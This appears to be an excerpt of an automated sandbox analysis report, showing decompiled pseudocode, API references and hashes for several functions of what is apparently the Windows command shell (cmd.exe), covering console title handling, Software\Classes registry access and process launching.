0x4a74a9b1
0x4a74a9b7
0x4a74a9b7
0x4a74a9a5
0x4a73b018
0x4a73b01f
0x4a73b022
0x4a73b02b
0x4a73b02d
0x4a73b02d
0x4a73b041
0x4a74a9bd
0x4a74a9bd
0x4a73b050
0x4a73b055
0x4a73b05b
0x4a74a9d3
0x4a74a9de
0x4a74a9e4
0x4a74a9eb
0x4a74a9f1
0x4a74a9f1
0x4a73b06d
0x4a73b080
0x4a73b08b
0x4a73b08b
0x4a73b0a0

APIs

GetEnvironmentVariableW.KERNEL32(DIRCMD,?,00000106), ref: 4A73B002

Strings

@, xrefs: 4A73B024
DIRCMD, xrefs: 4A73AFD7

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: EnvironmentVariable
String ID: @$DIRCMD
API String ID: 1431749950-2446930488
Opcode ID: 64d0333ed9b835500c7ccb8a2e923f24272b63c319d0d183c5b6a72b40894862
Instruction ID: ec64d3b2a5952722a65da6b2342c882986ec87b2c298e08718ff9bd11ef16fd9
Opcode Fuzzy Hash: 64d0333ed9b835500c7ccb8a2e923f24272b63c319d0d183c5b6a72b40894862
Instruction Fuzzy Hash: 0C51F2F68146689ADB71CF64CC847DEB7B8AF58204F4245EAD30CA7112E7305B88CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 4A7324ED, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E4A7324ED(void* __eax, void* __ecx, intOrPtr* _a4) {
				WCHAR* _v8;
				void* __esi;
				void* _t15;
				long _t16;
				signed int _t19;
				WCHAR* _t24;
				intOrPtr* _t30;
				short _t34;
				intOrPtr _t35;
				signed int _t36;
				short* _t38;
				WCHAR* _t40;
				WCHAR* _t42;
				void* _t44;

				_t15 = __eax;
				if(_a4 != 0 &&  *0x4a7540b4 == 0 &&  *0x4a7540e4 == 0) {
					_t16 = E4A731896(0x20c);
					_t40 = _t16;
					_v8 = _t40;
					if(_t40 == 0) {
						L15:
						return _t16;
					}
					_t16 = GetConsoleTitleW(_t40, 0x104);
					if(_t16 == 0) {
						goto L15;
					}
					_t30 = _a4;
					_t4 = _t30 + 2; // 0x2
					_t44 = _t4;
					do {
						_t35 =  *_t30;
						_t30 = _t30 + 2;
					} while (_t35 != 0);
					_t36 =  *0x4a754158; // 0x0
					_t6 = _t16 + 0xa; // 0xa
					_t45 = _t36 + (_t30 - _t44 >> 1) + _t6;
					_t42 = E4A732536(_t40, _t36 + (_t30 - _t44 >> 1) + _t6 + _t36 + (_t30 - _t44 >> 1) + _t6);
					if(_t42 == 0) {
						L14:
						_t16 = E4A73142E(_v8);
						goto L15;
					}
					_v8 = _t42;
					if( *0x4a754083 != 0) {
						_t19 =  *0x4a754158; // 0x0
						E4A73185A( &(_t42[_t19]), _t45 - _t19, _a4);
						L13:
						SetConsoleTitleW(_t42);
						goto L14;
					}
					E4A7320A9(_t45, _t42, _t45, " - ");
					_t24 = _t42;
					_t9 =  &(_t24[1]); // 0x2
					_t38 = _t9;
					do {
						_t34 =  *_t24;
						_t24 =  &(_t24[1]);
					} while (_t34 != 0);
					 *0x4a754158 = _t24 - _t38 >> 1;
					E4A7320A9(_t45, _t42, _t45, _a4);
					 *0x4a754083 = 1;
					goto L13;
				}
				return _t15;
			}

0x4a7324ed
0x4a7324f7
0x4a7374ac
0x4a7374b1
0x4a7374b3
0x4a7374b8
0x4a737558
0x00000000
0x4a737558
0x4a7374c4
0x4a7374cc
0x00000000
0x00000000
0x4a7374d2
0x4a7374d6
0x4a7374d6
0x4a7374d9
0x4a7374d9
0x4a7374dd
0x4a7374de
0x4a7374e3
0x4a7374ef
0x4a7374ef
0x4a7374fd
0x4a737501
0x4a73754f
0x4a737552
0x00000000
0x4a737557
0x4a73750a
0x4a73750d
0x4a749d8e
0x4a749d9d
0x4a737548
0x4a737549
0x00000000
0x4a737549
0x4a73751a
0x4a73751f
0x4a737521
0x4a737521
0x4a737524
0x4a737524
0x4a737528
0x4a737529
0x4a737537
0x4a73753c
0x4a737541
0x00000000
0x4a737541
0x4a732507

APIs

GetConsoleTitleW.KERNEL32 ref: 4A7374C4
SetConsoleTitleW.KERNEL32(00000000), ref: 4A737549

Strings

- , xrefs: 4A737513

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: ConsoleTitle
String ID: -
API String ID: 3358957663-3695764949
Opcode ID: 64678a9f9aca070c31e8b168baf7e5d5be40e6419a0e34685088b84478790d20
Instruction ID: 182995d01a6fce75770d688e3429a4276a8ddac653e13b2c51f427cb9b5f3a5f
Opcode Fuzzy Hash: 64678a9f9aca070c31e8b168baf7e5d5be40e6419a0e34685088b84478790d20
Instruction Fuzzy Hash: 3D213BF250A915FAD771CB58C809AEA3FBDEBC2344F134068E505DB542EB31DA49D790

Uniqueness

Uniqueness Score: -1.00%

Function 4A74D40E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78
registryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E4A74D40E(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				long _t19;
				intOrPtr* _t22;
				intOrPtr _t30;
				long _t33;
				signed int _t35;
				void* _t36;
				signed int _t37;
				void* _t45;

				_t36 = __ecx;
				_push(0x18);
				_push(0x4a74d518);
				E4A73264A(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t45 - 0x28)) = 0;
				 *((intOrPtr*)(_t45 - 0x24)) = 0;
				_t19 = RegOpenKeyExW(0x80000002, L"Software\\Classes", 0, 0x2000000, _t45 - 0x1c);
				 *(_t45 - 0x20) = _t19;
				if(_t19 == 0) {
					_t22 = E4A7322CA( *((intOrPtr*)( *((intOrPtr*)(_t45 + 8)) + 0x3c)), 0x4a74bd20, 3);
					_t43 = _t22;
					 *((intOrPtr*)(_t45 - 4)) = 0;
					if( *_t22 != 0) {
						_t35 = E4A7319D6(E4A732598(_t36, _t43));
						 *((intOrPtr*)(_t45 - 0x28)) = _t35;
						__eflags = _t35;
						if(_t35 != 0) {
							_t37 =  *(E4A73413B(_t43)) & 0x0000ffff;
							__eflags = _t37;
							if(_t37 != 0) {
								__eflags = _t37 - 0x3d;
								if(_t37 == 0x3d) {
									_t44 = E4A73413B(_t27);
									_t30 = E4A7319D6(E4A732598(_t37, _t28));
									 *((intOrPtr*)(_t45 - 0x24)) = _t30;
									__eflags = _t30;
									if(_t30 != 0) {
										__eflags =  *((intOrPtr*)(E4A73413B(_t44)));
										if(__eflags != 0) {
											goto L8;
										} else {
											_t33 = E4A74D26F(_t35, 0, _t44, __eflags,  *(_t45 - 0x1c), _t35,  *((intOrPtr*)(_t45 - 0x24)));
											goto L12;
										}
									}
								} else {
									L8:
									_push(0);
									_push(0x232a);
									E4A736D44(_t37);
								}
							} else {
								_push(_t35);
								goto L3;
							}
						}
					} else {
						_push(0);
						L3:
						_push( *(_t45 - 0x1c));
						_t33 = E4A74D0F9();
						L12:
						 *(_t45 - 0x20) = _t33;
					}
					 *((intOrPtr*)(_t45 - 4)) = 0xfffffffe;
					E4A74D503();
					RegCloseKey( *(_t45 - 0x1c));
					_t19 =  *(_t45 - 0x20);
				}
				return E4A7313B6(_t19);
			}

0x4a74d40e
0x4a74d40e
0x4a74d410
0x4a74d415
0x4a74d41c
0x4a74d41f
0x4a74d436
0x4a74d43c
0x4a74d441
0x4a74d454
0x4a74d459
0x4a74d45b
0x4a74d461
0x4a74d47a
0x4a74d47c
0x4a74d47f
0x4a74d481
0x4a74d489
0x4a74d48c
0x4a74d48f
0x4a74d494
0x4a74d498
0x4a74d4af
0x4a74d4b8
0x4a74d4bd
0x4a74d4c0
0x4a74d4c2
0x4a74d4ca
0x4a74d4cd
0x00000000
0x4a74d4cf
0x4a74d4d6
0x00000000
0x4a74d4d6
0x4a74d4cd
0x4a74d49a
0x4a74d49a
0x4a74d49a
0x4a74d49b
0x4a74d4a0
0x4a74d4a6
0x4a74d491
0x4a74d491
0x00000000
0x4a74d491
0x4a74d48f
0x4a74d463
0x4a74d463
0x4a74d464
0x4a74d464
0x4a74d467
0x4a74d4db
0x4a74d4db
0x4a74d4db
0x4a74d4de
0x4a74d4e5
0x4a74d4ed
0x4a74d4f3
0x4a74d4f3
0x4a74d4fb

APIs

RegOpenKeyExW.KERNEL32 ref: 4A74D436

Part of subcall function 4A7322CA: iswspace.MSVCRT ref: 4A73238B

RegCloseKey.KERNEL32(?), ref: 4A74D4ED

Strings

Software\Classes, xrefs: 4A74D42C

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseOpeniswspace
String ID: Software\Classes
API String ID: 1054702887-1656466771
Opcode ID: 73163313c69f62d7804425893f5cd3fc57abedc7fe8d615cdfd9f912c989159c
Instruction ID: a929f2296b0e2f67e81fec823011e28808469ae32b672c0785740061a5318225
Opcode Fuzzy Hash: 73163313c69f62d7804425893f5cd3fc57abedc7fe8d615cdfd9f912c989159c
Instruction Fuzzy Hash: 742125B0849A19BADFB1ABE4CC58DDF7EB9EF58240F22C055E580BF053D6380A08C760

Uniqueness

Uniqueness Score: -1.00%

Function 4A74DDAB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76
registryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E4A74DDAB(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				long _t19;
				intOrPtr* _t22;
				intOrPtr _t29;
				long _t32;
				intOrPtr* _t34;
				void* _t35;
				signed int _t36;
				void* _t44;

				_t35 = __ecx;
				_push(0x18);
				_push(0x4a74deb0);
				E4A73264A(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t44 - 0x28)) = 0;
				 *((intOrPtr*)(_t44 - 0x24)) = 0;
				_t19 = RegOpenKeyExW(0x80000002, L"Software\\Classes", 0, 0x2000000, _t44 - 0x1c);
				 *(_t44 - 0x20) = _t19;
				if(_t19 == 0) {
					_t22 = E4A7322CA( *((intOrPtr*)( *((intOrPtr*)(_t44 + 8)) + 0x3c)), 0x4a74bd20, 3);
					_t42 = _t22;
					 *((intOrPtr*)(_t44 - 4)) = 0;
					if( *_t22 != 0) {
						_t34 = E4A7319D6(E4A732598(_t35, _t42));
						 *((intOrPtr*)(_t44 - 0x28)) = _t34;
						if(_t34 != 0) {
							_t36 =  *(E4A73413B(_t42)) & 0x0000ffff;
							if(_t36 != 0) {
								if(_t36 == 0x3d) {
									_t43 = E4A73413B(_t27);
									_t29 = E4A7319D6(_t28);
									 *((intOrPtr*)(_t44 - 0x24)) = _t29;
									if(_t29 != 0) {
										if( *((intOrPtr*)(E4A73413B(_t43))) != 0) {
											goto L8;
										} else {
											_t32 = E4A74DB5E( *(_t44 - 0x1c), _t34,  *((intOrPtr*)(_t44 - 0x24)));
											goto L12;
										}
									}
								} else {
									L8:
									_push(0);
									_push(0x232a);
									E4A736D44(_t36);
								}
							} else {
								_push(_t34);
								goto L3;
							}
						}
					} else {
						_push(0);
						L3:
						_push( *(_t44 - 0x1c));
						_t32 = E4A74D88B();
						L12:
						 *(_t44 - 0x20) = _t32;
					}
					 *((intOrPtr*)(_t44 - 4)) = 0xfffffffe;
					E4A74DE9A();
					RegCloseKey( *(_t44 - 0x1c));
					_t19 =  *(_t44 - 0x20);
				}
				return E4A7313B6(_t19);
			}

0x4a74ddab
0x4a74ddab
0x4a74ddad
0x4a74ddb2
0x4a74ddb9
0x4a74ddbc
0x4a74ddd3
0x4a74ddd9
0x4a74ddde
0x4a74ddf1
0x4a74ddf6
0x4a74ddf8
0x4a74ddfe
0x4a74de17
0x4a74de19
0x4a74de1e
0x4a74de26
0x4a74de2c
0x4a74de35
0x4a74de4c
0x4a74de4f
0x4a74de54
0x4a74de59
0x4a74de64
0x00000000
0x4a74de66
0x4a74de6d
0x00000000
0x4a74de6d
0x4a74de64
0x4a74de37
0x4a74de37
0x4a74de37
0x4a74de38
0x4a74de3d
0x4a74de43
0x4a74de2e
0x4a74de2e
0x00000000
0x4a74de2e
0x4a74de2c
0x4a74de00
0x4a74de00
0x4a74de01
0x4a74de01
0x4a74de04
0x4a74de72
0x4a74de72
0x4a74de72
0x4a74de75
0x4a74de7c
0x4a74de84
0x4a74de8a
0x4a74de8a
0x4a74de92

APIs

RegOpenKeyExW.KERNEL32 ref: 4A74DDD3

Part of subcall function 4A7322CA: iswspace.MSVCRT ref: 4A73238B

RegCloseKey.KERNEL32(?), ref: 4A74DE84

Strings

Software\Classes, xrefs: 4A74DDC9

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseOpeniswspace
String ID: Software\Classes
API String ID: 1054702887-1656466771
Opcode ID: d14bc6cceeb345e3d86a5c5d2e2811aa536ec063ca21b7f2e78967c6795c8ee8
Instruction ID: fc5880da88fac73f1fead2f1c96f4d1b27a4c4820436fa921665f8e3d5b2a3ed
Opcode Fuzzy Hash: d14bc6cceeb345e3d86a5c5d2e2811aa536ec063ca21b7f2e78967c6795c8ee8
Instruction Fuzzy Hash: B721C2B1849A29BADB729FA0CC4C9EF7AB8EF65350F128055E181BE053E7710D48C760

Uniqueness

Uniqueness Score: -1.00%

Function 4A73684E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E4A73684E(int __ebx, signed int __ecx, signed int __edx, signed int _a4) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v32;
				short _v33856;
				char _v66624;
				char _v83008;
				char _v99392;
				char _v115776;
				signed int _v115788;
				long _v115800;
				intOrPtr _v115801;
				signed int _v115808;
				char _v115813;
				signed int _v115820;
				signed int _v115824;
				int _v115828;
				signed int _v115832;
				WCHAR* _v115840;
				WCHAR* _v115844;
				intOrPtr _v115848;
				long _v115852;
				intOrPtr _v115856;
				void* _v115860;
				struct _PROCESS_INFORMATION _v115876;
				long _v115880;
				int _v115892;
				void* _v115896;
				struct _STARTUPINFOW _v115964;
				void* _v115972;
				long _v115996;
				signed int _v116000;
				WCHAR* _v116004;
				char* _v116008;
				WCHAR* _v116012;
				void* _v116020;
				intOrPtr _v116024;
				void _v116028;
				struct _STARTUPINFOW _v116096;
				void* __edi;
				void* __esi;
				signed int _t114;
				long _t121;
				void* _t123;
				int _t129;
				long _t130;
				signed int _t131;
				signed int _t140;
				long _t142;
				signed int _t147;
				signed int _t149;
				long* _t150;
				long _t151;
				long _t152;
				long* _t155;
				int* _t159;
				signed int* _t162;
				long _t166;
				signed int _t181;
				intOrPtr* _t190;
				signed int _t192;
				intOrPtr* _t194;
				int _t209;
				intOrPtr _t210;
				intOrPtr _t219;
				signed int _t220;
				void* _t221;
				intOrPtr* _t223;
				intOrPtr _t224;
				void* _t227;
				void* _t228;
				WCHAR* _t229;
				void* _t230;
				int _t233;
				intOrPtr _t234;
				long _t235;
				signed int _t239;
				void* _t240;

				_t220 = __edx;
				_t211 = __ecx;
				_t209 = __ebx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t223 = _a4;
				_t233 =  *(_t223 + 0x3c);
				if(_t233 == 0) {
					L14:
					if( *_t223 != 0x14) {
						goto L61;
					} else {
						goto L15;
					}
				} else {
					while(1) {
						_t114 =  *_t233 & 0x0000ffff;
						if(_t114 == 0 || _t114 > 0x20) {
							break;
						}
						_t233 = _t233 + 2;
						if(_t233 != 0) {
							continue;
						}
						break;
					}
					if(_t233 == 0) {
						goto L14;
					} else {
						__imp___wcsnicmp(_t233, E4A736908, 2);
						_t240 = _t240 + 0xc;
						if(_t114 != 0) {
							L10:
							if(_t233 != 0) {
								_t114 = swscanf(_t233, E4A735104,  &_a4);
								_t240 = _t240 + 0xc;
								if(_t114 == 1) {
									_t114 = _a4;
									 *0x4a754188 = _t114;
									if( *0x4a7540e4 != 0) {
										_v8 = _t114;
									}
								}
							}
							goto L14;
						} else {
							_t233 = _t233 + 4;
							 *_t223 = 0x14;
							 *(_t223 + 0x3c) = L":EOF";
							if(_t233 == 0) {
								L15:
								if( *0x4a7540b4 == 0) {
									L61:
									E4A7315D2(_t114,  *0x4a7541a8);
									_push( *0x4a754188);
									E4A7372E9(_t211, _t223, _t233, __eflags);
									asm("int3");
									_v115813 = 1;
									__eflags = _v115801 - _t209;
									if(_v115801 != _t209) {
										L23:
										__eflags = _v115848 - _t209;
										if(_v115848 != _t209) {
											SetConsoleCtrlHandler(_t209, 1);
										}
										_v116096.cb = 0x44;
										GetStartupInfoW( &_v116096);
										_v115964.lpDesktop = _v116096.lpDesktop;
										__eflags = _v115801 - _t209;
										if(_v115801 != _t209) {
											_v115828 = _t209;
											goto L32;
										} else {
											_v115852 = _t209;
											_t150 =  &_v115852;
											__imp__InitializeProcThreadAttributeList(_t209, 2, _t209, _t150);
											__eflags = _t150 - _t209;
											if(_t150 != _t209) {
												 *0x4a754128 = 0x54f;
												goto L48;
											} else {
												_t233 = GetLastError;
												_t151 = GetLastError();
												__eflags = _t151 - 0x7a;
												if(_t151 != 0x7a) {
													_t152 = GetLastError();
													goto L77;
												} else {
													_t233 = GetProcessHeap;
													_t227 = HeapAlloc(GetProcessHeap(), 8, _v115852);
													__eflags = _t227 - _t209;
													if(_t227 == _t209) {
														_t152 = GetLastError();
														L77:
														 *0x4a754128 = _t152;
														goto L48;
													} else {
														_t155 =  &_v115852;
														__imp__InitializeProcThreadAttributeList(_t227, 2, _t209, _t155);
														__eflags = _t155 - _t209;
														if(_t155 == _t209) {
															 *0x4a754128 = GetLastError();
															goto L80;
														} else {
															_v115892 = 1;
															_t159 =  &_v115892;
															__imp__UpdateProcThreadAttribute(_t227, _t209, 0x60001, _t159, 4, _t209, _t209);
															__eflags = _t159 - _t209;
															if(_t159 == _t209) {
																L81:
																 *0x4a754128 = GetLastError();
																__imp__DeleteProcThreadAttributeList(_t227);
																L80:
																HeapFree(GetProcessHeap(), _t209, _t227);
																goto L48;
															} else {
																_v115896 = _t227;
																__eflags = _v115832 - 0xffff;
																if(_v115832 != 0xffff) {
																	_v115824 = _v115832 & 0x0000ffff;
																	_t162 =  &_v115824;
																	__imp__UpdateProcThreadAttribute(_t227, _t209, 0x20004, _t162, 2, _t209, _t209);
																	__eflags = _t162 - _t209;
																	if(_t162 != _t209) {
																		goto L31;
																	} else {
																		goto L81;
																	}
																} else {
																	L31:
																	_t166 = _v115808 | 0x00000400;
																	__eflags = _t166;
																	_v115828 = CreateProcessW( &_v33856, _v115844, _t209, _t209, 1, _t166, _v115860, _v115840,  &_v115964,  &_v115876);
																	__imp__DeleteProcThreadAttributeList(_t227);
																	HeapFree(GetProcessHeap(), _t209, _t227);
																	L32:
																	__eflags = _v115848 - _t209;
																	if(_v115848 != _t209) {
																		SetConsoleCtrlHandler(_t209, _t209);
																	}
																	_t121 = GetLastError();
																	 *0x4a754128 = _t121;
																	__eflags = _v115828 - _t209;
																	if(_v115828 == _t209) {
																		__eflags = _v115801 - _t209;
																		if(_v115801 == _t209) {
																			__eflags =  *0x4a754081 - _t209; // 0x0
																			if(__eflags == 0) {
																				L53:
																				__eflags = _t121 - 0x2e4;
																				if(_t121 == 0x2e4) {
																					goto L42;
																				} else {
																				}
																			} else {
																				__eflags = _t121 - 0xc1;
																				if(_t121 == 0xc1) {
																					goto L42;
																				} else {
																					goto L53;
																				}
																			}
																		} else {
																			L42:
																			_t233 = 0x3c;
																			_t123 = memset( &_v116028, _t209, _t233);
																			_v116028 = _t233;
																			_v116024 = 0x8140;
																			__eflags = _v115808 & 0x00000010;
																			if((_v115808 & 0x00000010) != 0) {
																				_v116024 = 0x140;
																			}
																			__imp__GetConsoleWindow();
																			_v116020 = _t123;
																			_v116012 =  &_v33856;
																			_v116008 =  &_v83008;
																			_v116004 = _v115840;
																			_v116000 = _v115964.wShowWindow & 0x0000ffff;
																			_v8 = _t209;
																			_t129 =  *0x4a75403c( &_v116028);
																			_v115828 = _t129;
																			__eflags = _t129 - _t209;
																			if(_t129 == _t209) {
																				_t130 = _v115996;
																				__eflags = _t130 - _t209;
																				if(_t130 == _t209) {
																					 *0x4a754128 = 8;
																				} else {
																					__eflags = _t130 - 0x20;
																					if(_t130 == 0x20) {
																						 *0x4a754128 = 2;
																					} else {
																						 *0x4a754128 = _t130;
																					}
																				}
																			} else {
																				_v115876.hProcess = _v115972;
																			}
																			_v8 = 0xfffffffe;
																		}
																		__eflags = _v115828 - _t209;
																		if(_v115828 != _t209) {
																			goto L36;
																		} else {
																			L48:
																			E4A74065B(_t233,  &_v33856);
																			goto L49;
																		}
																	} else {
																		__eflags = _v115820 - _t209;
																		if(_v115820 != _t209) {
																			asm("stosd");
																			asm("stosd");
																			asm("stosd");
																			_t140 =  &_v115800;
																			__imp__GetThreadGroupAffinity(_v115876.hThread, _t140);
																			__eflags = _t140;
																			_t235 = _v115800;
																			if(_t140 == 0) {
																				_t235 = _v115880;
																			}
																			__eflags = _v115832 - 0xffff;
																			if(_v115832 != 0xffff) {
																				asm("stosd");
																				asm("stosd");
																				asm("stosd");
																				_t147 =  &_v115788;
																				__imp__GetNumaNodeProcessorMaskEx(_v115832, _t147);
																				__eflags = _t147;
																				if(_t147 == 0) {
																					L90:
																					_v115820 = _t209;
																				} else {
																					_t149 = _v115788 & _t235;
																					__eflags = _t149;
																					if(_t149 == 0) {
																						goto L90;
																					} else {
																						_t235 = _t149;
																						__imp__RtlFindLeastSignificantBit(_v115788, _t209);
																						_t211 = _t149;
																						_v115820 = _v115820 << _t149;
																					}
																				}
																			}
																			_t142 = _v115820 & _t235;
																			__eflags = _t142;
																			if(_t142 != 0) {
																				_t235 = _t142;
																			}
																			SetProcessAffinityMask(_v115876.hProcess, _t235);
																		}
																		ResumeThread(_v115876.hThread);
																		CloseHandle(_v115876.hThread);
																		L36:
																		__eflags = _v115876.hProcess - _t209;
																		if(_v115876.hProcess != _t209) {
																			_push(_v115876);
																			__eflags = _v115856 - _t209;
																			if(_v115856 != _t209) {
																				 *0x4a754188 = E4A733BE0(_t211);
																			} else {
																				CloseHandle();
																			}
																		}
																		_t131 = 0;
																		__eflags = 0;
																	}
																}
															}
														}
													}
												}
											}
										}
									} else {
										__eflags = _v115813 - _t209;
										if(_v115813 != _t209) {
											_t228 = E4A732070(L"COMSPEC");
											__eflags = _t228 - _t209;
											if(_t228 == _t209) {
												_push(_t209);
												_push(0x400023d2);
												E4A736D44(_t211);
												L49:
												_t131 = 1;
											} else {
												E4A73179D( &_v115776, _t233, L" /K %s",  &_v99392);
												_t240 = _t240 + 0x10;
												E4A73185A( &_v33856, _t233, _t228);
												E4A73185A( &_v99392, _t233,  &_v33856);
												_t181 =  &_v115776;
												__imp___wcsicmp(L" /K ");
												_t211 = _t181;
												__eflags = _t181;
												if(_t181 != 0) {
													__eflags = _v83008 - _t209;
													if(_v83008 != _t209) {
														_t190 =  &_v83008;
														_t221 = _t190 + 2;
														do {
															_t219 =  *_t190;
															_t190 = _t190 + 2;
															__eflags = _t219 - _t209;
														} while (_t219 != _t209);
														_t192 = _t190 - _t221;
														__eflags = _t192;
														_t220 = _t192 >> 1;
														_t194 =  &_v115776;
														_t230 = _t194 + 2;
														do {
															_t211 =  *_t194;
															_t194 = _t194 + 2;
															__eflags = _t211 - _t209;
														} while (_t211 != _t209);
														__eflags = (_t194 - _t230 >> 1) + _t220 - _t233;
														if((_t194 - _t230 >> 1) + _t220 >= _t233) {
															E4A736D44(_t211, 0x2363, 1,  &_v83008);
															_t240 = _t240 + 0xc;
														} else {
															E4A7320A9(_t233,  &_v115776, _t233, E4A7325B8);
															E4A7320A9(_t233,  &_v115776, _t233,  &_v83008);
														}
													}
												}
												_t229 =  &_v115776;
												goto L20;
											}
										} else {
											_t229 = _v115844;
											L20:
											E4A73185A( &_v66624, _t233,  &_v99392);
											E4A7320A9(_t233,  &_v66624, _t233, E4A7325B8);
											__eflags = _t229 - _t209;
											if(_t229 != _t209) {
												E4A7320A9(_t233,  &_v66624, _t233, _t229);
											}
											_v115844 =  &_v66624;
											goto L23;
										}
									}
									 *[fs:0x0] = _v20;
									_pop(_t224);
									_pop(_t234);
									_pop(_t210);
									__eflags = _v32 ^ _t239;
									return E4A7313A9(_t131, _t210, _v32 ^ _t239, _t220, _t224, _t234);
								} else {
									E4A736447(_t220, _t223);
									return _v8;
								}
							} else {
								while(1) {
									_t114 =  *_t233 & 0x0000ffff;
									if(_t114 == 0 || _t114 > 0x20) {
										goto L10;
									}
									_t233 = _t233 + 2;
									if(_t233 != 0) {
										continue;
									}
									goto L10;
								}
								goto L10;
							}
						}
					}
				}
			}

0x4a73684e
0x4a73684e
0x4a73684e
0x4a736853
0x4a736854
0x4a73685a
0x4a73685d
0x4a736862
0x4a7368e3
0x4a7368e6
0x00000000
0x00000000
0x00000000
0x00000000
0x4a736864
0x4a736864
0x4a736864
0x4a73686a
0x00000000
0x00000000
0x4a736873
0x4a736874
0x00000000
0x00000000
0x00000000
0x4a736874
0x4a736878
0x00000000
0x4a73687a
0x4a736882
0x4a736888
0x4a73688d
0x4a7368b3
0x4a7368b5
0x4a7368c1
0x4a7368c7
0x4a7368cd
0x4a7368d6
0x4a7368d9
0x4a7368de
0x4a7368e0
0x4a7368e0
0x4a7368de
0x4a7368cd
0x00000000
0x4a73688f
0x4a73688f
0x4a736892
0x4a736898
0x4a73689f
0x4a7368ec
0x4a7368f3
0x4a7409d3
0x4a7409d9
0x4a7409de
0x4a7409e4
0x4a7409e9
0x4a7409ea
0x4a739158
0x4a73915e
0x4a7391b6
0x4a7391b6
0x4a7391bc
0x4a74033a
0x4a74033a
0x4a7391c2
0x4a7391d3
0x4a7391df
0x4a7391e5
0x4a7391eb
0x4a73fc1c
0x00000000
0x4a7391f1
0x4a7391f1
0x4a7391f7
0x4a739202
0x4a739208
0x4a73920a
0x4a74b769
0x00000000
0x4a739210
0x4a739210
0x4a739216
0x4a739218
0x4a73921b
0x4a74b778
0x00000000
0x4a739221
0x4a739229
0x4a739238
0x4a73923a
0x4a73923c
0x4a74b784
0x4a74b77a
0x4a74b77a
0x00000000
0x4a739242
0x4a739242
0x4a73924d
0x4a739253
0x4a739255
0x4a74b792
0x00000000
0x4a73925b
0x4a73925b
0x4a739269
0x4a739277
0x4a73927d
0x4a73927f
0x4a74b7a7
0x4a74b7ad
0x4a74b7b3
0x4a74b797
0x4a74b79c
0x00000000
0x4a739285
0x4a739285
0x4a73928b
0x4a739295
0x4a74b7c2
0x4a74b7cc
0x4a74b7da
0x4a74b7e0
0x4a74b7e2
0x00000000
0x4a74b7e8
0x00000000
0x4a74b7e8
0x4a73929b
0x4a73929b
0x4a7392bb
0x4a7392bb
0x4a7392d8
0x4a7392df
0x4a7392ea
0x4a7392f0
0x4a7392f0
0x4a7392f6
0x4a74032c
0x4a74032c
0x4a7392fc
0x4a739302
0x4a739307
0x4a73930d
0x4a73fb2b
0x4a73fb31
0x4a73fc27
0x4a73fc2d
0x4a73fc3a
0x4a73fc3a
0x4a73fc3f
0x00000000
0x00000000
0x4a73fc45
0x4a73fc2f
0x4a73fc2f
0x4a73fc34
0x00000000
0x00000000
0x00000000
0x00000000
0x4a73fc34
0x4a73fb37
0x4a73fb37
0x4a73fb39
0x4a73fb43
0x4a73fb4b
0x4a73fb51
0x4a73fb5b
0x4a73fb62
0x4a73fb64
0x4a73fb64
0x4a73fb6e
0x4a73fb74
0x4a73fb80
0x4a73fb8c
0x4a73fb98
0x4a73fba5
0x4a73fbab
0x4a73fbb5
0x4a73fbbb
0x4a73fbc1
0x4a73fbc3
0x4a7406c2
0x4a7406c8
0x4a7406ca
0x4a74b88d
0x4a7406d0
0x4a7406d0
0x4a7406d3
0x4a74b89c
0x4a7406d9
0x4a7406d9
0x4a7406d9
0x4a7406d3
0x4a73fbc9
0x4a73fbcf
0x4a73fbcf
0x4a73fbd5
0x4a73fbd5
0x4a73fbdc
0x4a73fbe2
0x00000000
0x4a73fbe8
0x4a73fbe8
0x4a73fbef
0x00000000
0x4a73fbef
0x4a739313
0x4a739313
0x4a739319
0x4a74b7f2
0x4a74b7f3
0x4a74b7f4
0x4a74b7f5
0x4a74b802
0x4a74b808
0x4a74b80a
0x4a74b810
0x4a74b812
0x4a74b812
0x4a74b818
0x4a74b822
0x4a74b82c
0x4a74b82d
0x4a74b82e
0x4a74b82f
0x4a74b83c
0x4a74b842
0x4a74b844
0x4a74b869
0x4a74b869
0x4a74b846
0x4a74b84c
0x4a74b84c
0x4a74b84e
0x00000000
0x4a74b850
0x4a74b850
0x4a74b859
0x4a74b85f
0x4a74b861
0x4a74b861
0x4a74b84e
0x4a74b844
0x4a74b875
0x4a74b875
0x4a74b877
0x4a74b879
0x4a74b879
0x4a74b882
0x4a74b882
0x4a739325
0x4a739331
0x4a739337
0x4a739337
0x4a73933d
0x4a73933f
0x4a739345
0x4a73934b
0x4a740206
0x4a739351
0x4a739351
0x4a739351
0x4a73934b
0x4a739357
0x4a739357
0x4a739357
0x4a73930d
0x4a739295
0x4a73927f
0x4a739255
0x4a73923c
0x4a73921b
0x4a73920a
0x4a739160
0x4a739160
0x4a739166
0x4a740a00
0x4a740a02
0x4a740a04
0x4a74b73c
0x4a74b73d
0x4a74b742
0x4a73fbf4
0x4a73fbf6
0x4a740a0a
0x4a740a1e
